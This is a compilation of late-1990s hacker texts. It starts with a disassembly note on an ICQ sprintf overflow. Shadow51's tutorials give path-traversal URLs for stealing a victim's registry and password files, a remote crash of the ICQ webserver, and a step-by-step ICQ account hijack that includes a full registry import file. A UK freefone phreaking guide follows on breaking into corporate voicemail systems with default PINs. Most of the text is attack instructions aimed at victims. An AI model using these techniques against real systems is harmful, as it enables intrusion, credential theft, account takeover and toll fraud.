> messages from arbitrary ICQ users is easy, as is sending file and chat
> requests. Even worse, if the client gets anything it doesn't expect it
> crashes(!) sometimes taking Windows with it.

Spoofing chat requests? Crashes?

00422D4D    lea     ecx, [ebp-118h]
00422D53    push    dword ptr [esi+18h]
00422D56    push    offset aTheFollowingRe
00422D5B    push    ecx
00422D5C    call    ds:sprintf
...
004B58F8 aTheFollowingRe db 0Dh,0Ah             ; DATA XREF: _text:00422D56o
004B58F8         db 'The following reason for a chat request was given: ',0Dh,0Ah
004B58F8         db ' %s',0Dh,0Ah,0

Unless there's bounds checking done before we get here, this overflow is exploitable -- the buffer is on the stack. I'm too lazy to boot Windows to check now.

Anyway, there're 100+ references to sprintf() and strcpy() in ICQ, at least some of these have to be exploitable. IDA (the disassembler) is even able to detect standard MSVC functions, so you get symbolic names for them right after the disassembly, and can open a window with the cross references list.

Signed,
Solar Designer

Addendum(if any):

ICQ Homepage Exploit
By Shadow51

Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely, and even download their files. The only problem is that you can't see the files, so you have to know what you're downloading.

To close the ICQ client:

1. Click on the start button
2. Click on RUN
3. Type Telnet 123.123.123.123 80
   Of course replace the 123.123.123.123 by the IP of the victim (note that this bug only works on build 1700 and maybe a few others, but I'm not sure).
4. Press ENTER and wait until it connects
5. Type QUIT

Wait about 10 seconds. If they go offline that means it worked; if not, then it didn't work.

Now suppose you want to get some of their files. Let's say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on:

1. Go to your browser
2. Type http://123.123.123.123/.html/......../windows/win.ini
   Note that you need the /.html/ part. It will trick the server into believing it's a html file. Also note that there are 8 dots /......../ (that means it goes back 4 dirs). If the user's ICQ dir is not in a standard place it can cause problems, but 95% of the time it's in c:\progra~1\icq\
3. Press ENTER in your browser

It will simply ask you where you want to save the file; then you save it and do whatever you want with it.

Now this is not all you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for you :P.

Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user you're hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose you have Win98, and they have Win95: it won't work. An easy way to make sure it's the same version is to download their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this is a good one.

1. Get 2 files
   http://123.123.123.123/.html/......../windows/user.dat and
   http://123.123.123.123/.html/......../windows/system.dat
   Remember to change the IP when you're done.
2. Copy them in a directory.
3. Make a backup copy of your c:\windows\user.dat and c:\windows\system.dat. You're gonna want to have them back when you're done.
4. Restart your computer
5. Press F8 just before it boots up
6. Choose "Command Prompt Only"
7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked
8. Reboot your computer
9. Just before it boots, press F8 several times; choose safe mode.
10. Once booted in safe mode, click on start
11. Click on RUN
12. Type regedit
13. Press ENTER
14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..."
15. Save the file, then get yourself a Password Cracker
16. If all goes well, you now have all the user's passwords.
It should look something like this:

crypt_Blizzard_Storm : A@N
www.mircosoft.com : Administration:PASSWORD
*Rna\Dan\dannyk : q34ad6gt
*Rna\Test\957935 : nar8s7yj
*Rna\Test2\wolves : cyal8r
*Rna\Test3\curtisph : q73vnrht
*Rna\My Connection\USERNAME : PASSWORD
*Rna\My Connection 3\USERNAME : PASSWORD

17. Reboot
18. Press F8 at startup
19. Choose "Command Prompt Only"
20. Replace user.dat and system.dat with your originals that you previously had backed up

Shadow51
29000000
Shadow51@writeme.com

-----------------------------------------------------------------------------------------------------------------------

ICQ Account Cracking
By Shadow51

A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it doesn't work every time. All you do is put in this:

1. Download the following files from the targeted user's hard drive using the ICQ exploit (replace 123.123.123.123 by the guy's IP and UIN by the guy's ICQ #; note that there are 6 dots, not 8):

   http://123.123.123.123/.html/....../db/UIN.idx
   http://123.123.123.123/.html/....../db/UIN.dat
   http://123.123.123.123/.html/....../db/UINmsg.dat
   http://123.123.123.123/.html/....../db/UINmsg.idx
   http://123.123.123.123/.html/....../db/UINhis.idx
   http://123.123.123.123/.html/....../db/UINhis.dat

2. Open Notepad and create a new document.
3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking.) (I got this registry key from http://i.am/devil)

REGEDIT4 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN] "Name"="Hacked UIN" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs] "Random Groups Version"=dword:0000000a "Online Color"=dword:00ff0000 "Unlisted Color"=dword:00800000 "Offline Color"=dword:000000ff "Authorize Color"=dword:00400080 "Notify Color"=dword:00800080 "LastStatus Color"=dword:00008000 "Default File Dir"="C:\\Program Files\\ICQ\\Received Files" "SMTP Address"="" "DND Message"="Please do not disturb me now.
Disturb me later." "Out Message"="" "Busy Message"="User is occupied. Only urgent messages will be delivered." "Chat Message"="I would like to chat about anything" "Away PreNum"=dword:00000000 "Out PreNum"=dword:00000000 "Busy PreNum"=dword:00000000 "DND PreNum"=dword:00000000 "Chat PreNum"=dword:00000000 "File Options"=dword:00000004 "URL Options"=dword:00000004 "Chat Options"=dword:00000004 "All Options"=dword:0000000e "EXT Options"=dword:00000004 "Startup"="No" "Auto Away"="No" "Auto Hide Time"=dword:0000001e "Auto Hide"="No" "Move Server Top"="No" "Blink In Tray"="No" "Sort Lists"="Yes" "Show Online List"="No" "Remove AddFriend"="Yes" "Splash Open"="Yes" "History Last First"="Yes" "FloatTop"="Yes" "Thru Server"="No" "Join Chat"="No" "Open URL Browser"="No" "Refuse File NotInList"="No" "Overwrite ExistFile"="No" "Disable Online Alert"="Yes" "Accept Urgent In Busy"="No" "Blink Tray In AwayBusy"="Yes" "Use Contact List Color"="No" "Contact List Color"=dword:00c8b99d "Save User File"="Yes" "Auto Update"="Yes" "Search Wizard"="No" "Default Mailer"="Yes" "Pop Play Sound"="Yes" "Pop Auto Launch"="No" "Pop Check"="No" "Pop Time"=dword:0000000a "Check Headers"="Yes" "MoveToOutDelay"=dword:00000014 "MoveToOut"="No" "MoveToAwayDelay"=dword:0000000a "MoveToAway"="No" "Auto Sleep Mode"="No" "Log History Events"="Yes" "Connection Type"="Permanent" "Firewall"="Yes" "UseGivenIP"="No" "Socks"="No" "SocksPort"=dword:00000438 "SocksServer"="Enter your socks server" "ProxySocks4Host"="Enter your proxy server" "ProxySocks4Port"=dword:00000438 "UseProxySocks4"="No" "GiveStats"="No" "SocksVersion"=dword:00000004 "SocksAuthentication"=dword:00000000 "FirewallTimeout"=dword:0000001e "UseFirewallTimeout"="No" "UseFirewallRangePorts"="Yes" "FirewallFromPort"=dword:000059d8 "FirewallToPort"=dword:00007148 "Old Sockets"="No" "UserType"=dword:00000000 "Mail Receipients"=";" "Random Available"="No" "RandomGroupName"=dword:00000001 "Random Name"="#¥d¶³ 666 £[" "Allow Secure Clients 
Only"="Yes" "PhoneApproval"="Yes" "PhoneToneTime"=dword:00000032 "PhonePauseTime"=dword:000001f4 "PhoneBreakTime"=dword:00000028 "PhoneSettings"=dword:00000001 "PhonePauseChar"="," "PhoneLocalP"=" " "PhoneLongP"=" " "PhoneInterP"=" " "Chat RoomName"="Product Support / Suggestion" "Auto Join Chat Room"="Yes" "Novice Counter"=dword:0000000a "Menu Counter"=dword:00000013 "Servers Version"=dword:00000001 "Externals Version"=dword:00000019 "Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "Novice"="No" "Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00 "State Flags"=dword:00000000 "Server Msg Version"=dword:0000000b "Server Msg Shown"=dword:00000001 "Server Msg Count"=dword:00000009 "LeftButton Warning"="No" "Menu Left Click"="No" "Tip Startup"="No" "Tip Position"=dword:00000000 "MoreEvents Warning"="No" "Invisible Warning"="No" "Send Later Warning Off"="No" "Busy Warning"="No" "Away Warning"="No" "DND Warning"="No" "FT Warning"="No" "Ext Warning"="No" "Out Warning"="No" "Chat Warning"="No" "Away Message"="User is currently away\r\nYou can leave him/her a message" "Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth." [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets] "OutMsg Presets 0"="I'm out'a here. 
See you tomorrow!" "DNDMsg Presets 0"="Please do not disturb me now. Disturb me later." "Away PresetsMsg 0"="Away" "Out PresetsMsg 0"="Out for the day" "Busy PresetsMsg 0"="Busy" "DND PresetsMsg 0"="DND" "Chat PresetsMsg 0"="Chat" "AwayMsg Presets 1"="I am out to lunch. I will return shortly." "OutMsg Presets 1"="" "DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed." "ChatMsg Presets 1"="Come Join my chat room!" "Away PresetsMsg 1"="Lunch" "Out PresetsMsg 1"="Not here" "Busy PresetsMsg 1"="Meeting" "DND PresetsMsg 1"="Meeting" "Chat PresetsMsg 1"="Come In" "AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!" "OutMsg Presets 2"="I'm closed for the weekend/holidays." "DNDMsg Presets 2"="Don't disturb my concentration!" "ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!" "Away PresetsMsg 2"="Be right back" "Out PresetsMsg 2"="Closed" "Busy PresetsMsg 2"="Concentration" "DND PresetsMsg 2"="Concentration" "Chat PresetsMsg 2"="Fun" "AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished." "OutMsg Presets 3"="Gone fishin'." "DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!" "ChatMsg Presets 3"="What are you waiting for? Come on in!" "Away PresetsMsg 3"="Dog Walk" "Out PresetsMsg 3"="Fishing" "Busy PresetsMsg 3"="On the Phone" "DND PresetsMsg 3"="On the Phone" "Chat PresetsMsg 3"="Don't Wait" "AwayMsg Presets 4"="Went out for a smoke. " "OutMsg Presets 4"="I'm sleeping. Don't wake me." "DNDMsg Presets 4"="I can't chat with you now. I'm busy." "ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat." "Away PresetsMsg 4"="Smoke" "Out PresetsMsg 4"="Sleeping" "Busy PresetsMsg 4"="Can't chat " "DND PresetsMsg 4"="Can't chat " "Chat PresetsMsg 4"="Hear" "AwayMsg Presets 5"="On my Coffee break." "OutMsg Presets 5"="Went home. Had to feed the kids." "DNDMsg Presets 5"="Can't you see I'm working?" 
"ChatMsg Presets 5"="Enter your chat room message here" "Away PresetsMsg 5"="Coffee" "Out PresetsMsg 5"="Kids" "Busy PresetsMsg 5"="Working" "DND PresetsMsg 5"="Working" "Chat PresetsMsg 5"="Empty" "AwayMsg Presets 6"="Went to get some fresh air." "OutMsg Presets 6"="Gone for good." "DNDMsg Presets 6"="Enter your occupied message here" "ChatMsg Presets 6"="Enter your chat room message here" "Away PresetsMsg 6"="Air" "Out PresetsMsg 6"="Gone" "Busy PresetsMsg 6"="Conversing" "DND PresetsMsg 6"="Empty" "Chat PresetsMsg 6"="Empty" "BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered." "DNDMsg Presets 7"="Enter your occupied message here" "ChatMsg Presets 7"="Enter your chat room message here" "Away PresetsMsg 7"="Empty" "Out PresetsMsg 7"="Empty" "Busy PresetsMsg 7"="Empty" "DND PresetsMsg 7"="Empty" "Chat PresetsMsg 7"="Empty" "BusyMsg Presets 0"="User is currently Occupied" "ChatMsg Presets 0"="I would like to chat about anything" "BusyMsg Presets 1"="User is currently Occupied1" "BusyMsg Presets 2"="User is currently Occupied2" "BusyMsg Presets 3"="User is currently Occupied" "BusyMsg Presets 4"="User is currently Occupied" "BusyMsg Presets 5"="User is currently Occupied" "BusyMsg Presets 6"="User is currently Occupied" "AwayMsg Presets 7"="User is currently away" "OutMsg Presets 7"="User is currently N/A" "AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0] "Message"="Please bookmark our network status page." 
"URLName"="http://www.mirabilis.com/status.html" "URL"="press here" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1] "URLName"="http://www.mirabilis.com/emailsig.html" "URL"="Go to the ICQ e-mail signature generator" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2] "Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group - home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )" "URLName"="http://www.icq.com/announcements/02.html" "URL"="It's fun and easy, GO!!" "Date"="31-MAR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3] "URLName"="http://www.icq.com/announcements/whitepages.html" "URL"="Go!" "Date"="1-APR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4] "Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!" "URLName"="http://www.mirabilis.com/email.html" "URL"="E-mail notification instructions" "Date"="15-JUN-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5] "URLName"="http://www.icq.com/announcements/05.html" "URL"="Create your Greeting" "Date"="12-JUL-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="26-AUG-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7] "Message"="ICQ can alert you when you receive Emails and show you the Email headers!" 
"URLName"="http://www.icq.com/announcements/07.html" "URL"="Learn how to do it" "Date"="06-SEPT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="20-OCT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1] "Name"="General Chat" "Number"=dword:00000001 "Version"=dword:00000001 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2] "Name"="Romance" "Number"=dword:00000002 "Version"=dword:00000002 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3] "Name"="Games" "Number"=dword:00000003 "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4] "Name"="Students" "Number"=dword:00000004 "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5] "Name"="20 Something" "Number"=dword:00000006 "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6] "Name"="30 Something" "Number"=dword:00000007 "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7] "Name"="40 Something" "Number"=dword:00000008 "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8] "Name"="50 Plus" "Number"=dword:00000009 "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1] "Host"="icq1.mirabilis.com" "Port"=dword:00000fa0 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals] 
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta] "Type"="Command" "Command Line"="/ip:" "Path"="C:\\Program Files\\Canasta\\Canasta.exe" "URL"="http://ourworld.compuserve.com/homepages/mharte" "Version"=dword:0000000f [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone] "Type"="Extension" "Format"="/p:tcp /ac:" "Extension"="cvp" "URL"="http://www.connectix.com/html/videophone.html" "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme] "Type"="Command" "Command Line"="" "Path"="C:\\CUSEEME\\CUSEEM32.EXE" "URL"="http://www.cu-seeme.com/" "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone] "Type"="Extension" "Format"="" "Extension"="iru" "URL"="http://irisphone.com/" "Version"=dword:0000000a [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat] "Type"="ServerExtension" "Format"="1.1\\n-u 1 -a " "Extension"="vce" "NumParameters"=dword:00000002 "Server1"="vchat1.microsoft.com" "URL"="http://vchat1.microsoft.com" "Version"=dword:00000011 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1] "ParamName"="World" "CanOtherChange"="No" "Param1"="#Compass" "Param2"="#BugWorld" "Param3"="#Fishbowl" "Param4"="#Lodge" "Param5"="#Lunar" "Param6"="#Lodge" "Param7"="#Practice" "Param8"="#RedDen" "Param9"="#TableTop" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2] "ParamName"="Avatar" "CanOtherChange"="Yes" "Param1"="Amani" "Param2"="Anderson" "Param3"="Brb" "Param4"="Cat" "Param5"="Crab" "Param6"="Dancer" "Param7"="Dred" "Param8"="Duggan" "Param9"="Joey" "Param10"="Lulu" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk] "Type"="Command" "Command Line"="" "Path"="C:\\Program 
Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE" "URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html" "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx] "Type"="ClientServer" "Client Command Line"="/CLIENT %i" "Server Command Line"="/SERVER" "Client Path"="C:\\Rikken\\Rikken.exe" "Server Path"="C:\\Rikken\\Rikken.exe" "URL"="http://www.dse.nl/~ramon/rikken/" "Version"=dword:00000017 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone] "Type"="Extension" "Format"="callto://" "Extension"="vdp" "URL"="http://www.vdo.net/download/" "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall] "Type"="Command" "Command Line"="" "Path"="C:\\VidCall\\Corp.EXE" "URL"="http://www.access.digex.net/~vidcall/vidcall.html" "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone] "Type"="Extension" "Format"="" "Extension"="wpc" "URL"="http://www.webphone.com/" "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake] "Type"="ClientServer" "Client Command Line"="-mpath +connect %i" "Server Command Line"="-mpath -listen" "Client Path"="c:\\quake_sw\\Q95.bat" "Server Path"="c:\\quake_sw\\Q95.bat" "Server1"="quake.xmisson.com" "URL"="http://www.idsoftware.com" "Version"=dword:00000010 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat] "Type"="ServerCommand" "Format"="GROUPNAME=i PORT=15000" "Path"="C:\\Program Files\\VoxChat\\VoxChat.exe" "NumParameters"=dword:00000001 "Server1"="voxchat1.voxware.com" "Server2"="voxcha2.voxware.com" "URL"="http://www.voxchat.com/low/download.htm" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1] "ParamName"="Room" "CanOtherChange"="No" "Param1"="#ICQ" 
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations] "LastUpdate"=dword:00000000 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main] "SelectedCell"=dword:00000000 "AlwaysOnTop"="Yes" "LeftBarWidth"=dword:000000ad "RightBarWidth"=dword:000000ad "FloatBar-Left"=dword:00000255 "FloatBar-Right"=dword:00000307 "FloatBar-Top"=dword:00000033 "FloatBar-Bottom"=dword:000001f3 "State"="Floating" "Minimized"="No" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows] "Response"=dword:008f00c9 "SearchWiz"=dword:006f00c0 "NotifyWiz"=dword:006f00c0 "posNovice"=dword:009300dc "posMOTD"=dword:00af00b7 "posMenuConfig"=dword:00a900e7 "RemoveUIN"=dword:00bb0108 "Message"=dword:008b004f "Security"=dword:007400b4 "Prefs"=dword:007f00ae "History"=dword:0096003a "File Request"=dword:009000f0 "FileTransfer"=dword:009700ae "Info"=dword:009300d2 "FetchUser"=dword:00e9010e "URL Message"=dword:00a00069 "Away"=dword:00bd00f7 "Chat Request"=dword:009f00dd "Contacts List"=dword:008300bd "Chat"=dword:008b00f5 "Phone"=dword:000a000a "Phone Call Request"=dword:007700e5 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search] "Place"=dword:00a400cc "Type"=dword:00000002 "Width"=dword:01880188 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat] "ChatStyle Counter"=dword:00000003 "Pen Color"=dword:0080ffff "Back Color"=dword:00004000 "Send Focus"="Yes" "Enable Sounds"="Yes" "Name Bars"="Yes" "Always On Top"="No" "AutoColor"="No" "OverRide Format"="Yes" "Show Toolbar"="Yes" "State"=dword:00010000 "New Font Name"="Times New Roman" "Char Set"=dword:00000000 "IRCListWidth"=dword:00000006 "Font Pitch"=dword:00000012 "New Font Height"=dword:0000000e "Font Effects"=dword:00000000 "AutoColor 0"=dword:00000000 "AutoColor 1"=dword:00000080 "AutoColor 2"=dword:00008000 "AutoColor 3"=dword:00008080 "AutoColor 4"=dword:00800000 "AutoColor 5"=dword:00800080 "AutoColor 6"=dword:00808000 "AutoColor 7"=dword:00808080 "AutoColor 
8"=dword:00c0c0c0 "AutoColor 9"=dword:000000ff "AutoColor 10"=dword:0000ff00 "AutoColor 11"=dword:0000ffff "AutoColor 12"=dword:00ff0000 "AutoColor 13"=dword:00ff00ff "AutoColor 14"=dword:00ffff00 "AutoColor 15"=dword:00ffffff "Place-Left"=dword:0000000a "Place-Right"=dword:000001fe "Place-Top"=dword:0000000a "Place-Bottom"=dword:0000021a "New LogFile name"="ICQChatLog.txt" "New SaveFile name"="ICQChatSave.txt"

4. Save the file as HACKEDICQ.REG
5. If you have ICQ open, close it.
6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory, e.g. c:\progra~1\ICQ\db
7. Open the HACKEDICQ.REG file
8. When it asks if you would like to add this to your registry, click YES.
9. Open the DB convert program in your ICQ directory (it comes with ICQ99), then click on "Convert a old DB"
10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it manually.
11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there are 2 things that may have happened:
    I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK.
    II. They are still online. The only thing you can do is wait until they go offline.
12. Once you are successfully in the user's ICQ, quickly change the user's password. Once this is complete, you will be in total control over the user's ICQ account. Mission success.

ICQ Exploit Tips
-----------------

Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys.

I saw in the original ICQ Exploit text that the HTTP server exploit doesn't work on NT, so I went into NT and I tested it. The result was that the system wasn't exploitable.
Hence, if you are running NT, and you want to use the HTTP server; it's 100% safe for you to do so. Shadow51 29000000 Shadow51@hackcity.com ***BEGINNERS FREEFONE PHREAKING IN THE UK (1998)*** *************************************************** (I Couldn't get in contact with the authors of this file, but it's a good text non the less so, In it goes - The Information is still relevant even though it's from 98 - CrossFire) - by uV & Senor Cardini - DISCLAIMER (All the information in this file is for educational purposes only. No-one involved in the compilation of this file would suggest using it for any purposes leagal/illegal whatsoever. In fact it might all be complete bollocks for all we know etc) !! Loadsa phun to be had on freephone numbers !! Freefone phreaking is calling freephone (0500/0800) numbers and using the interesting systems that are often on the other end. This often means accessing company's phone system to obtain free calls or services. I will cover the three main areas:- VMB Hacking, Dial-Outs and Conference System abuse. There are countless other systems on 0800's that are not covered here. **Scanning** You need to scan a lot of 0800/0500 numbers to find useful numbers. You can't use a scanning program like Toneloc here as you are not looking for a modem carrier signal. This means dialling hundreds of numbers by hand. Apparently BT are able to detect mass 0800 scanning done from your home phone but I know lots of people who have called 1000's and never heard a peep. Still a phone box is better if you're paranoid. You may reach foreign systems on UK 0800 numbers. The 0800 89XXXX range is full of these as is the 0800 9XXXX range. These are also referred to as Country Direct numbers (check out the back of you BT Book). These are cool as you may get access to systems in that country. USA numbers a great because the US has loads more conferences, loops and PBX's than we do and lots of these are on the WWW. 
Companies are getting wise to abuse of their systems. Certain numbers are always getting hacked and are now completely blocked. It might be worth avoiding the 0800 89xxxx range for this reason. 0500 numbers don't get anywhere near as much attention... :-)

So choose the range of numbers you are going to scan and get going. Make a note of what you find and what time you dialled. It is best to dial out of hours for whatever country the line terminates in, otherwise a lot of numbers will be picked up by a human. You are looking for dial-tones, other tones and automated attendants, mail-boxes etc.

Getting in: Let's say you have the number of an American company on a 0800 89XXXX. This might answer as "Welcome to ABC company voice-mail system, if you know the number of the person you want to reach dial it now. If you have a mail-box on the system press 9. If you want to reach assistance dial 0 or stay on the line". Listen to the whole message - there may be other options. If you get no options try the * or # keys or combinations of these with numbers like 1, 8 or 9. This may throw you into the voice mail. You may have to leave a message and then try to break out.

Get a range: Try dialling some extensions and get an idea of the range of numbers accepted. You are starting to map the system. Some extensions (often at the end of the allowable range or a one-off number like 2000, 4444 etc.) will have an out-dial on them.

**The Systems**

*VMB's

This is accessing voice-mail systems and using the features to your own ends. You can set up your own free voice-mail box or listen to confidential messages etc. This is obviously boring after the first few times. The real interest comes when there is an out-dial, conference box or whatever on the system that is only accessible by valid mailbox owners. This centres around the fact that most VMB passwords are either the same as the box number (Box=3300, PW=3300), a crappy default (1234), easy to remember/guess (1111, 1234 etc.)
or similar (box number+0). When you enter the voice-mail system it will often tell you what make it is: Meridian, Octel, Norstar or whatever. This obviously helps a lot, although particularly sad individuals will come to recognise them by the prompts anyway. You really need to try all these numbers and map out systems for yourself to get a good idea of what's out there. There are loads of texts specific to VMB brands. I reckon Meridian are the easiest to hack (pass-code is the box number as default and they have an excellent help facility - press the * key). I will only touch on Meridian systems to give you an idea of how they work. A lot of the points are relevant to other systems.

Meridian Voice-mail:-

I suggest you read Coldfire's text on Meridians. I won't go into details as he does it well and I don't want to quote it word for word. I will therefore cover the practical hacking aspects; I will assume you will go get that text! Ok, here are a few of the more essential ones:

*8   is mailbox commands
*7   is message commands
*81  is login
011  is name-directory
011# is dial any number/extension - depends on whether you're logged in/masks etc. (see below)
*80  is mailbox features - options here to allow you to change the number that is dialled when 0 is pressed (normally the operator) - has some potential...

Let's say you called a company, pressed * and got "Hello, you have reached the voice-mail system. If you have a mailbox on the system press pound (#), or if you wish to reach someone and know the 4 digit extension please dial it now". If you press # you get "Meridian Mail. Mailbox?" - this is expecting a 4 digit code+# and a 4 digit pass-code+#. Unfortunately you have no idea of the allowable codes. They could be random or more likely within a certain range. 3000 is normally a good shot BUT seeing as the login sequence will only let you know whether you have got BOTH codes correct you'll have a hard time hacking it.
